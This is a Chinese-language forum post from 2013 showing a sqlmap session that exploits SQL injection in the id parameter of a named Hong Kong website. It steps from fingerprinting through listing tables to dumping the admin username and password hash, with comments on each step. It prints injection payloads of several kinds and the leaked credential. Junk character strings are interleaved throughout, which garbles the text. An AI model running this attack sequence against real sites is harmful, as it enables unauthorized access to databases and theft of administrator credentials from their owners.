D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ R3 T1 g3 K" }4 G) v8 q" g4 Qms "Mysql" --current-user /* 注解:获取当前用户名称3 z5 s( D$ T, Z
sqlmap/0.9 - automatic SQL injection and database takeover tool. u8 R( P" ?$ W) r
http://sqlmap.sourceforge.net starting at: 16:53:54
' i* F; U3 z7 [[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ V; A& G8 X! j9 l9 s
session file
! ~; M8 }9 M; k0 w' J[16:53:54] [INFO] resuming injection data from session file. z1 V# l+ k/ T+ J% y* j& \ b
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! }4 [8 u8 Q# F) v. ]& C, G. y6 Y
[16:53:54] [INFO] testing connection to the target url+ ^# n M# t/ |1 ~
sqlmap identified the following injection points with a total of 0 HTTP(s) reque& G; P2 @# U5 W3 G& a0 k* }
sts:6 ]- w; R) A1 L! ^" i( b' i
---: D* F! w6 Y- \& n
Place: GET
N+ K9 Y. O9 B1 D, z% uParameter: id
- x$ }/ P# [2 _, U Type: boolean-based blind
3 x+ \, i; I2 k+ p" M Title: AND boolean-based blind - WHERE or HAVING clause
1 W3 T2 g* W8 F3 R Payload: id=276 AND 799=7990 S) F( E1 [* b- U" B
Type: error-based4 Z: R' m7 {- N, F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: t2 a7 A/ h3 D, ] Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& Y! `) \' p! o# R5 k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, n! r) {5 k1 c6 ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 ~3 K4 X# }6 A
Type: UNION query0 }3 D5 `. D$ X' X, W. D! D2 V
Title: MySQL UNION query (NULL) - 1 to 10 columns
" c* o" W, a" T- _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) X6 X- T1 g' K2 P" j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),# G2 Z/ x5 H9 G {1 U) ^2 K$ P
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 P' |, f5 {3 @% s
Type: AND/OR time-based blind) ^ @5 R6 H, e* l6 X
Title: MySQL > 5.0.11 AND time-based blind5 M$ a9 S0 ^6 p% c
Payload: id=276 AND SLEEP(5)
4 @* g5 \$ N: \2 z% A/ r---
8 L3 k. n+ ^- W[16:53:55] [INFO] the back-end DBMS is MySQL6 p G4 G7 O% G
web server operating system: Windows
. Q* Z# A# b; ^2 U/ H+ Jweb application technology: Apache 2.2.11, PHP 5.3.07 ~8 a' C! e! F t3 O8 K; m( x) b5 r8 M
back-end DBMS: MySQL 5.0
0 S8 n% n& L5 ?1 }# N* E3 T[16:53:55] [INFO] fetching current user: Y1 v" K6 P" _, J# W) M# N
current user: 'root@localhost' $ Z+ x5 }( B) F3 w
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 n' U" y% @& S6 ~9 L4 K2 E
tput\www.wepost.com.hk' shutting down at: 16:53:58. T5 [8 M1 {0 ~4 N% L7 t6 y% e1 m
$ x9 M m* ^0 g2 D) r; RD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 T# m- g( f; O, Qms "Mysql" --current-db /*当前数据库
) @ m3 A i5 j# d sqlmap/0.9 - automatic SQL injection and database takeover tool
, [( ^; {3 @& k( ^1 T http://sqlmap.sourceforge.net starting at: 16:54:16
P8 E' \! u! ]0 N) `1 Q[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
+ E+ o" y8 a6 y, x session file. D4 R4 v) x" o
[16:54:16] [INFO] resuming injection data from session file" r9 m7 h: S% j$ S& N- N
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 C3 A1 N# c% ]5 k) [[16:54:16] [INFO] testing connection to the target url" ?8 Y2 Q' o) `7 J3 Z' w
sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 T% A8 C1 E9 ?& f- P" r: J
sts:
4 E+ |$ [. F; X; l' x1 D- x8 l5 \---
5 K1 |2 H: b/ _: g5 m3 @/ cPlace: GET
* Y' G" }; Z+ x6 n6 ?6 tParameter: id
* m' p9 ~: X! _& p' M2 `5 E Type: boolean-based blind
8 x8 |% Z7 ?1 _# y/ |. }: S Title: AND boolean-based blind - WHERE or HAVING clause8 @8 H- S: d. a0 v& o% c
Payload: id=276 AND 799=7996 |: s$ n( v4 m/ q( Y6 l, _
Type: error-based, P' f* W8 }. t
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ B% a, u9 C9 R5 C8 ^: l& p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 K! Z& A, o' p6 g C0 S$ ]0 i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( k/ S5 Z, d) e. q$ k% W
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ k2 O$ `4 M4 _6 g5 Y7 n
Type: UNION query
9 |! m- K1 z& Z+ ~5 A6 B Title: MySQL UNION query (NULL) - 1 to 10 columns" s( s7 {6 M% D+ ]/ U z* _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ [0 }9 n( R6 c; ?
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( O9 A. A6 [, P1 `+ E/ a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# J+ }# L0 Y* Q' O7 Z- f
Type: AND/OR time-based blind) A9 N( N# O/ r, S# W3 O/ p5 t
Title: MySQL > 5.0.11 AND time-based blind, G, |( V& E c+ T2 Y; a2 x
Payload: id=276 AND SLEEP(5)
9 K1 E. y* X- g6 E---
: W; \$ G) b, R. S[16:54:17] [INFO] the back-end DBMS is MySQL( M( h5 @2 k0 P; o6 e5 ]7 C r
web server operating system: Windows
3 `" ?/ b2 `2 p$ r5 s# B$ ~web application technology: Apache 2.2.11, PHP 5.3.0
! u, l6 ]# x2 A8 {; }back-end DBMS: MySQL 5.0
4 e% \) a9 w' a1 j4 R; ^[16:54:17] [INFO] fetching current database3 T# @% Z/ x5 k m& O8 p
current database: 'wepost'
/ Q) ^: n7 U9 H[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% Q# Z# C8 |6 dtput\www.wepost.com.hk' shutting down at: 16:54:18
. d6 P2 Y) E# i7 v, r* U- _1 _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 P P9 N5 O( E% M8 v
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
) u/ g+ V$ G' a# C# w sqlmap/0.9 - automatic SQL injection and database takeover tool3 D7 \4 R( @$ z& V9 K
http://sqlmap.sourceforge.net starting at: 16:55:257 r2 W! ^2 T, ~4 `. H8 @
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
3 j% [; h2 i" ]' V+ ` session file
+ S- c: l* u6 p# ^" Z$ M[16:55:25] [INFO] resuming injection data from session file
' l8 x0 j0 Z! S* `[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file6 u3 y c. h9 R
[16:55:25] [INFO] testing connection to the target url
& v& o. X; v- x9 g0 {. Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque( h+ x$ L) S4 r
sts:
~, ?7 D9 g9 z0 `---
7 m3 F/ q1 n0 P: ?: LPlace: GET, i3 D* Z/ n: h: U
Parameter: id2 ?8 `; l! W" G) i, G- f( O4 T- `, z
Type: boolean-based blind, d* j/ z* ~+ A- l3 `
Title: AND boolean-based blind - WHERE or HAVING clause7 |2 E5 c- f1 a. P2 x- @
Payload: id=276 AND 799=7997 C* y( g" S% [
Type: error-based: T# g$ ^% H$ | `) B8 U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. a7 ]6 f0 z+ C/ N$ h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. D0 n" _* L' b120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, \" ^1 n, e5 Q2 {. Q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- @) L3 d& V. B7 P9 d i
Type: UNION query) C% @+ m: A) U5 M Y
Title: MySQL UNION query (NULL) - 1 to 10 columns8 O; m$ b0 T/ |/ O( k9 X1 c; s- ^
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. d6 p! o6 v) } O I(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- g& ~- N( M; y; l) k+ v2 E8 ?9 W
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: P1 A9 w \" V' ]: ^& L Type: AND/OR time-based blind
& }! y3 h, n! ^4 u Title: MySQL > 5.0.11 AND time-based blind
/ E7 i2 v/ R4 i6 t# ?3 t1 ^ Payload: id=276 AND SLEEP(5)
4 j4 V7 ~/ J7 R5 N$ T7 B4 |---
0 |& R+ e* s$ p& {# b5 H8 j6 x[16:55:26] [INFO] the back-end DBMS is MySQL( g8 K y1 {2 g' C. `) M, h5 H
web server operating system: Windows
1 R% z; Z8 m, L' q( cweb application technology: Apache 2.2.11, PHP 5.3.0( {! |7 K& ~- i7 U; X/ u) L
back-end DBMS: MySQL 5.0
) j* Y2 n3 N' m! [[16:55:26] [INFO] fetching tables for database 'wepost'
& B& z z& B* \% C% \8 A4 z[16:55:27] [INFO] the SQL query used returns 6 entries! f6 E' f$ ~' ^1 x) o
Database: wepost
4 O8 W( d/ G9 c1 z1 V- C) Q[6 tables]
. ~+ B4 P0 ?$ s. h) i+-------------+
8 m7 [5 k) k) }* S% }8 y9 U| admin |
6 ] f7 o0 L( C+ M| article |" H7 s8 O9 v6 Z5 _/ X5 k
| contributor |5 @5 [" B# |; V: n! i/ B& C# E- v
| idea |$ m& O2 i9 y) u+ l H
| image |9 [" y) [8 [1 X7 t
| issue |
8 l( p/ x& I+ Q9 I y2 }: c+-------------+
' B$ m' c2 \$ i; O8 c$ |7 r: C% u r: m[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou6 n' C* i: L* R
tput\www.wepost.com.hk' shutting down at: 16:55:33
8 a! Z M; O5 L6 S7 q0 S# b Y6 C$ S4 X' N
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
n" r; f2 v0 P5 x- z; }2 _ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
" [, Z' y3 h: b2 h6 f) Z# X sqlmap/0.9 - automatic SQL injection and database takeover tool. h7 u3 h% j5 a6 }
http://sqlmap.sourceforge.net starting at: 16:56:06! g* o- R& K8 W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
) a5 q- K( T8 Z/ L2 t/ csts:; R; m$ b3 c4 w% W, g
---) i0 {% e& G o) Z$ a: i' @+ [
Place: GET
/ w' P% A, v7 ^% i, BParameter: id
; r W5 f7 v |+ |8 U; [' q Type: boolean-based blind% N/ z( B7 g5 ?. u U B3 p
Title: AND boolean-based blind - WHERE or HAVING clause
% X1 V" f3 G/ C+ O$ x, Y: _ Payload: id=276 AND 799=799 e2 p8 O; o/ v n
Type: error-based
6 Q- h2 F* u$ Y c% o [5 s" A Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Y4 }+ f0 [. Q- m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' o0 i. Y3 n3 V3 D. A8 f( f120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% _4 O9 R/ V. U+ t1 w
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- U* n$ H, @) I' J8 v& j
Type: UNION query) k' E3 e4 W' R
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 C' U" A4 \, j9 ~# E( Z( D4 w Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! w+ z& @% l; \' L% T
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ `0 D# s2 y M& T# w) Y' X. g1 d
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 n. m' t8 p) n4 k Type: AND/OR time-based blind
5 O. K" X# k0 P3 V6 j/ v9 D Title: MySQL > 5.0.11 AND time-based blind2 y: ~4 _( M& v- F1 {
Payload: id=276 AND SLEEP(5)
! m' Q- A8 b/ a/ E# k& f---
( ~! c0 p% m" ?, u, c4 l$ t8 Q+ e2 nweb server operating system: Windows% q" U: c; v, z* c& v% `! ~, Y
web application technology: Apache 2.2.11, PHP 5.3.0 C! y' Z! G _. M1 t, w' O5 U7 e
back-end DBMS: MySQL 5.0
r, s" X* |4 R O[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se. d3 q3 q+ ^8 i1 ^4 V" J/ D
ssion': wepost, wepost. m, D3 e b/ h3 p% F7 A
Database: wepost
; e$ m5 w7 S7 q$ C# {8 C0 r. gTable: admin7 K! h7 R* Y" J5 ~6 [
[4 columns]; e* t+ p0 o' L* H( l
+----------+-------------+
: l Z+ Z- ?0 U! D. T5 x| Column | Type |; `+ t1 {& @7 b$ W7 A
+----------+-------------+
: h1 z- l5 L& p, [| id | int(11) |
4 i; i8 X8 ^( K6 C0 t| password | varchar(32) |% ?" ]" `% M/ ?0 C( \3 s
| type | varchar(10) |1 N* {' `- m. f/ U" Z0 G
| userid | varchar(20) |
* e4 h6 t2 v+ ]: |: r+----------+-------------+& T1 k! |. S7 ?
shutting down at: 16:56:19% b- p* w Q$ f
. l' {! F) C0 ]- v/ c# a R- TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
$ \$ I7 ~$ G" D: b# D/ Sms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
( o% p9 ?9 r( V sqlmap/0.9 - automatic SQL injection and database takeover tool
2 a; P! b1 @) o0 L! X; O8 h- p J http://sqlmap.sourceforge.net starting at: 16:57:14
5 | l5 u( v8 ]0 i3 W1 H5 Osqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ G( N6 A/ e+ j2 ]. C5 Usts:
. q" @1 J4 O0 b8 L! j- |2 k, V0 D---
0 |9 p( s8 G% Z. e6 N/ dPlace: GET. l* r _, {. d
Parameter: id
( i- [$ X! F% a) Z Type: boolean-based blind
. r7 p9 D% m3 c' B, B7 I- K Title: AND boolean-based blind - WHERE or HAVING clause
( w; }( f) n* m% ~4 U3 ~ Payload: id=276 AND 799=7995 i5 P3 p1 \8 L A
Type: error-based' s; P" l) U8 T8 J6 ?. [9 N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% D2 v2 Q$ ~, `, _4 G9 ], M
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) ~. k1 o3 i/ d4 h' k9 ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ l: |, G* A% K+ T/ O),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" v) J2 D4 B" _6 o; o x Type: UNION query
2 \' f. O/ ~7 t Title: MySQL UNION query (NULL) - 1 to 10 columns' C2 {5 m$ n# x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, a3 `2 h. _8 B& u5 v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 j! Q5 A7 {1 q# o$ ], ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! `( A$ @" o5 X+ @( ^: U! }' c( L Type: AND/OR time-based blind( p6 w: [& l: {% J
Title: MySQL > 5.0.11 AND time-based blind
1 ?+ f% x3 U: J5 z Payload: id=276 AND SLEEP(5)* y) R& V3 j: W9 {5 A$ m/ q
---' ~/ V. b4 x4 G
web server operating system: Windows. D0 o! R4 s* o! }" V" o9 K
web application technology: Apache 2.2.11, PHP 5.3.0
" t- @/ [' D5 f' Y T4 l L, T" |/ sback-end DBMS: MySQL 5.0
/ A- i6 ]+ n- w ~3 |* irecognized possible password hash values. do you want to use dictionary attack o
3 c1 n' J ?7 ]n retrieved table items? [Y/n/q] y
! ~. i0 R% x6 e) @! Q- |- [2 l8 \what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]+ v" x$ b% r& k0 ^# K
do you want to use common password suffixes? (slow!) [y/N] y
6 H5 |* V& d0 B( t; T7 F! ^2 E1 x# {Database: wepost( {8 U' z+ x2 G+ ]+ p
Table: admin+ `* X+ z% N& y" h4 W
[1 entry]; }; ]# ^- U( p4 R
+----------------------------------+------------+
6 {) v6 b, F& G( g. p4 Q/ U| password | userid |! e e5 `3 }8 n) M+ [' t; h |" f
+----------------------------------+------------+ Y" e# L5 Y9 C, w
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
2 m7 P4 D1 p! X5 [% p+----------------------------------+------------+$ W5 P- M: h1 I* V Q8 ^) d% d1 Z
shutting down at: 16:58:14$ y! v5 E( y; p- P# `( |+ r: q
# a, w: ~7 s, m' x1 \2 r# P+ E
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对